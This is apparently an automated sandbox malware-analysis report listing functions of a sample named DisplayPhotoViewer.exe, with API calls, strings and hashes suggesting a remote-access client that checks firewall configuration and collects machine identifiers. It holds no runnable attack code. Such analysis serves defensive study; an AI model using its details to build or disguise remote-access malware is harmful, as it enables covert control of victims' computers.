                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CountTick
                                                                                                    • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                                    • API String ID: 536389180-1512301160
                                                                                                    • Opcode ID: 6712326f7cb336bd570c1108db24081ac50130fdae75c7c3966f1f3f11945869
                                                                                                    • Instruction ID: dbc20ce989c55911e800bd9570be593050ec5cdcd0db3d0f1d0b60d779270994
                                                                                                    • Opcode Fuzzy Hash: 6712326f7cb336bd570c1108db24081ac50130fdae75c7c3966f1f3f11945869
                                                                                                    • Instruction Fuzzy Hash: D2213874FB63F18AFB038AE19AC1365FAD1978132EF070039D514C658CE7B16280C792
                                                                                                    Function 11092230 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56comCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CoInitialize.OLE32(00000000), ref: 11092244
                                                                                                    • CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?), ref: 11092257
                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000001,111B43AC,?), ref: 11092274
                                                                                                    • CoUninitialize.OLE32 ref: 11092292
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                                    • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                                    • API String ID: 3222248624-258972079
                                                                                                    • Opcode ID: a82c26fd7a56e6dc6f3a826673e3394b5003c4943a9aca295082ba8be1e0ff14
                                                                                                    • Instruction ID: 4e180cb23d29f56530205e88458913b4593e4ad78d969186563f117c1e960f27
                                                                                                    • Opcode Fuzzy Hash: a82c26fd7a56e6dc6f3a826673e3394b5003c4943a9aca295082ba8be1e0ff14
                                                                                                    • Instruction Fuzzy Hash: 6601A574F0111D6BD700DFA5DC99AAFBB68AF40708F004168FA09D7104EB21EA4187E5
                                                                                                    Function 11107630 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,111085B5,11108150,00000001,00000000), ref: 11107647
                                                                                                    • CreateThread.KERNEL32(00000000,111085B5,00000001,00000000,00000000,0000000C), ref: 1110766A
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,111085B5,11108150,00000001,00000000,?,?,?,?,?,1102F5F3), ref: 11107697
                                                                                                    • CloseHandle.KERNEL32(?,?,111085B5,11108150,00000001,00000000,?,?,?,?,?,1102F5F3), ref: 111076A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                    • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                                    • API String ID: 3360349984-1136101629
                                                                                                    • Opcode ID: 4ca9d346845fa25128a1753a44eb42afc516d5f6881e149335a6838107f3435e
                                                                                                    • Instruction ID: 202952010c2a209b0a0bd61c2994d7b30ab434dc4522c0f1e308addca307e50e
                                                                                                    • Opcode Fuzzy Hash: 4ca9d346845fa25128a1753a44eb42afc516d5f6881e149335a6838107f3435e
                                                                                                    • Instruction Fuzzy Hash: 7B0171767407016FE7208E5AEC85F5BBBA8EB54725F108229FA55962C4DA70E4058BB0
                                                                                                    Function 1106D800 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 430COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • %02x , xrefs: 1106D8DD
                                                                                                    • Queue EV_CALLED_CONTROL: session=%d addr=%s extra=%s, xrefs: 1106DBA0
                                                                                                    • Error %dz discarded %-4u bytes: %s, xrefs: 1106D8FC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: %02x $Error %dz discarded %-4u bytes: %s$Queue EV_CALLED_CONTROL: session=%d addr=%s extra=%s
                                                                                                    • API String ID: 0-2590468221
                                                                                                    • Opcode ID: e8dea0c847aa651228b1e0d44732d9a2f8feda8d33b60ffd10a237089336bbb1
                                                                                                    • Instruction ID: ebb7493f0f2de6412e3c01577b3bec67747b6ceec621bb1ebc7724e91f1cc3c0
                                                                                                    • Opcode Fuzzy Hash: e8dea0c847aa651228b1e0d44732d9a2f8feda8d33b60ffd10a237089336bbb1
                                                                                                    • Instruction Fuzzy Hash: 36E183B4E0020A9BDB14DF54C990F6EB7ADFF89314F148159E9499F389DA70EC81CBA1
                                                                                                    Function 1102FEC0 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf
                                                                                                    • String ID: %s%s%s.bin$910646$_HF$_HW$_SW
                                                                                                    • API String ID: 2111968516-3152437985
                                                                                                    • Opcode ID: cb918f652d525e97b278af3517340a45392d6c1e7babdc5e4dcaff5f27f9f7a5
                                                                                                    • Instruction ID: c2332db2771bf07b50f11cf3bb8a73cd008e9a4d3eb5a97e60ad1037deff3be9
                                                                                                    • Opcode Fuzzy Hash: cb918f652d525e97b278af3517340a45392d6c1e7babdc5e4dcaff5f27f9f7a5
                                                                                                    • Instruction Fuzzy Hash: CDE09B71D0870C1FF641814C690579FBACC1B04769FC08454FEDAA6287F5259500C193
                                                                                                    Function 110FAD40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 110FAD93
                                                                                                    • GetStockObject.GDI32(00000004), ref: 110FADEB
                                                                                                    • RegisterClassA.USER32(?), ref: 110FADFF
                                                                                                    • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00100000,00000000,00000000,00000000), ref: 110FAE3A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                                    • String ID: NSMDesktopWnd
                                                                                                    • API String ID: 2669163067-206650970
                                                                                                    • Opcode ID: 3ec9fb06d36f15928af86bf9006faee28849d72b3f1898888c247150109798cc
                                                                                                    • Instruction ID: 9f8dd81fb97131f2a17aa61c2b67468a12f398e0ba51ba15830c75074ddcef4f
                                                                                                    • Opcode Fuzzy Hash: 3ec9fb06d36f15928af86bf9006faee28849d72b3f1898888c247150109798cc
                                                                                                    • Instruction Fuzzy Hash: E031D4B4D0165AAFCB41DFA9D880A9EFFF4FB08314F50862EE829E7240E7345540CB94
                                                                                                    Function 11109840 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 111097A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 111097CA
                                                                                                      • Part of subcall function 111097A0: __wsplitpath.LIBCMT ref: 111097E5
                                                                                                      • Part of subcall function 111097A0: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 11109819
                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 111098E8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                                    • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                                    • API String ID: 806825551-1858614750
                                                                                                    • Opcode ID: f9d9959397344636dc7975019574d2977f5b5c00808a9d528d84c34c8c64f6b7
                                                                                                    • Instruction ID: f45ce0f7169db0a25d1e6fc74838806ea3ee33c24c158f97c3dbd1adfa10429d
                                                                                                    • Opcode Fuzzy Hash: f9d9959397344636dc7975019574d2977f5b5c00808a9d528d84c34c8c64f6b7
                                                                                                    • Instruction Fuzzy Hash: DF216436E0018E9BD301CE309EA0BBBFBAA9FC6204F054469EC69C7241F626DA04C790
                                                                                                    Function 1113A570 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 11139F90: GetCurrentProcess.KERNEL32(11027F7F,?,1113A1E3,?), ref: 11139F9C
                                                                                                      • Part of subcall function 11139F90: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe,00000104,?,1113A1E3,?), ref: 11139FB9
                                                                                                    • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 1113A5C5
                                                                                                    • ResetEvent.KERNEL32(00000BD4), ref: 1113A5D9
                                                                                                    • SetEvent.KERNEL32(00000BD4), ref: 1113A5EF
                                                                                                    • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 1113A5FE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                                    • String ID: MiniDump
                                                                                                    • API String ID: 1494854734-2840755058
                                                                                                    • Opcode ID: 4382f9d7793314fe230039c3ab167cbcc668c3fd6bf60283c774d99928748dbd
                                                                                                    • Instruction ID: ed85a08320420e265ce7697ee8aa2d1ea6f32357d8646fad4537fb3caec7b9ac
                                                                                                    • Opcode Fuzzy Hash: 4382f9d7793314fe230039c3ab167cbcc668c3fd6bf60283c774d99928748dbd
                                                                                                    • Instruction Fuzzy Hash: 9811EC72E502156BE301DBE5AC91F5EF7989B84739F114234F924D71C8EB70A9018BF5
                                                                                                    Function 1113CCC0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 1113CCEF
                                                                                                    • wsprintfA.USER32 ref: 1113CD26
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                                    • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                                    • API String ID: 1985783259-2296142801
                                                                                                    • Opcode ID: 9f951b9eee57bf8c9f736079b0fca5555432e31cf2e708445e98ac77c1bc3c53
                                                                                                    • Instruction ID: a9029a21a3f55972a632b43b74ee58a4c52104f32f7088f8ab5a1a445247dcee
                                                                                                    • Opcode Fuzzy Hash: 9f951b9eee57bf8c9f736079b0fca5555432e31cf2e708445e98ac77c1bc3c53
                                                                                                    • Instruction Fuzzy Hash: F111E5FAA1011867C710DA65ED85FEEF76C9B84729F400165FF09B7149EA30AA0187A9
                                                                                                    Function 111077A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111583B1: __FF_MSGBANNER.LIBCMT ref: 111583CA
                                                                                                      • Part of subcall function 111583B1: __NMSG_WRITE.LIBCMT ref: 111583D1
                                                                                                      • Part of subcall function 111583B1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 111583F6
                                                                                                    • wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    • _memset.LIBCMT ref: 111077F7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                                    • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                                    • API String ID: 3234921582-2664294811
                                                                                                    • Opcode ID: bf5853befffb252c44a32a5b0653fbe8a40c3126add25175a497d30b44db0839
                                                                                                    • Instruction ID: 968d62244f9bf34ff5e22c4a98ef88c83d2bf086518960ed259ccedc48f06065
                                                                                                    • Opcode Fuzzy Hash: bf5853befffb252c44a32a5b0653fbe8a40c3126add25175a497d30b44db0839
                                                                                                    • Instruction Fuzzy Hash: 3AF0F6B6E4151863C760DA65ED01FEFF76C9F81608F400069EE0467242EA74AB05C7D6
                                                                                                    Function 1102FDD0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • wsprintfA.USER32 ref: 1102FE86
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$ErrorExitLastMessageProcess
